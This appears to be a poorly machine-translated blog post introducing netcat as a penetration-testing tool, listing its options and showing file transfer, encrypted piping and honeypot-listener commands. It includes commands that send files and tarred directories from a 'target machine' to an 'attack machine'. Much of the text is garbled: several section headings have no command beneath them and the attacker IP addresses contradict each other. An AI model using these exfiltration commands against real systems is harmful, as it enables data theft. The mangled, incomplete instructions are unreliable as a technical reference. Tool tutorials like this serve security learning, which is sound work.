Engaged in the penetration test for several years, and in the process of doing the project found that good penetration technology is important, but want to test out more results, can not be separated from a powerful tool. Even the ability of super cattle, I think it is impossible to completely do infiltration, after all, penetration test or a manual labor.
Some people now think that penetration testing is getting simpler, because open source automation tools a big push, the wheels are also upgrading. Even if the security ignorant, as long as the tool a run can get a lot of loopholes, and even automated access permissions. I have to admit that the current automated infiltration tool has reduced the entry threshold for this industry, but that does not mean that penetration testing is becoming easier.
First of all, my reason is that security is always a long time, technology has never stalled, security technology is always ahead of the security tools, so only use the tools, and sometimes make the penetration test work is difficult to carry out, because the means of protection increasingly updated , While the attack technology can only rely on lagging behind the tools, so the test results can be seen. Followed by the current market, a powerful penetration of the tools, need to use a certain basis, not fool-style operation, want to use a good artifact, it is not easy. To sum up, I personally think that the current penetration of the test work will be more difficult, and with the national enterprises on the safety of attention, penetration test practitioners shoulders the burden will only be heavier.
The opening of the half-day egg is nothing more than to lead the theme of this series – infiltration artifact, the reason you want to introduce the record used in the penetration test artifact, because the work is good , must first of its profits, nothing more!
This article as the first of this series, will introduce an infiltration of the enduring artifact, the reputation of the Swiss military knife nc. Most of the contents of this article from the Internet, such as the old content can be self-bypass, I try to record all aspects of nc use, all when the personal inquiries, can be sprayed.
Introduce to Netcat
nc full name netcat, is a network tool in the Swiss Army knife, it can through TCP and UDP in the network to read and write data, powerful.
Linux/Mac acquiescence installed nc, you can enter the command line nc -h view.
Windows can be downloaded under the nc.exe tool.
Can enter nc -h to view help:
-h to view the help information
-d background mode
-g gateway source-routing hop point [s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-e prog program redirect, The use of [dangerous]
-i secs delay interval-
l monitoring mode for inbound
connection-L monitor mode, the connection is still closed after the closure until the CTR + C-
n IP address, can not use the domain name (do not use DNS Reverse the IP address of the domain name)
-o film record hexadecimal transmission-
p [space] port local port number
-s addr local source address-
r random local and remote port-
t use Telnet interactive mode-
u UDP mode
– V detailed output, with -vv will be more detailed
-w digital timeout delay interval
-z will be input, output off (for swiping anchor)
PortScan (port scan)
Basic tcp scan:
Set the delay, specify the port scan:
Target to listen to a port:
The machine is connected to this port:
The local monitor a port:
Target connection to this port:
Download the file on the target machine
The machine as a target machine, because it is the network ip, simulation of the situation, 126.96.36.199 for the attack machine, now is to download the file from the target machine to the attack machine.
Target machine: nc.exe 188.8.131.52 9999 <H: \ test.txt will be under the target machine H drive under the test.txt file to attack aircraft 9999 port
attack machine: nc.exe-d -l-p 9999> test. Txt will be the machine 9999 port transmission over the file renamed test.txt
Upload file to target machine
Attacker: nc -d -l -p 9990 <test2.txt
Target machine: nc 184.108.40.206 9990> test2.txt
Port data capture packets
With the command, you can zoom in on the function of nc.
Encrypted transmission of data
Server: $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
Client: $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567
Target machine: $tar -cvf – dir_name | nc -l 1567
Attacker: $nc -n 10.0.0.2 1567 | tar -xvf –
- nc -L -p 80 as a honeypot 1: open and keep listening to port 80 until CTR + C
- nc -L -p 80 > c:\log.txt as a honeypot with 2: open and keep listening to port 80, until the CTR + C, while the results are output to c: \ log.txt
- nc -L -p 80 < c:\honeyport.txt as a honeypot with 3-1: open and keep listening to port 80 until tick + C, and c: \ honeyport.txt content into the pipeline, Can also play a role in the transmission of documents
- type.exe c:\honeyport | nc -L -p 80 as a honeypot with 3-2: open and keep listening to port 80, until CTR + C, and c: \ honeyport.txt content into the pipeline , Can also play a role in the transmission of documents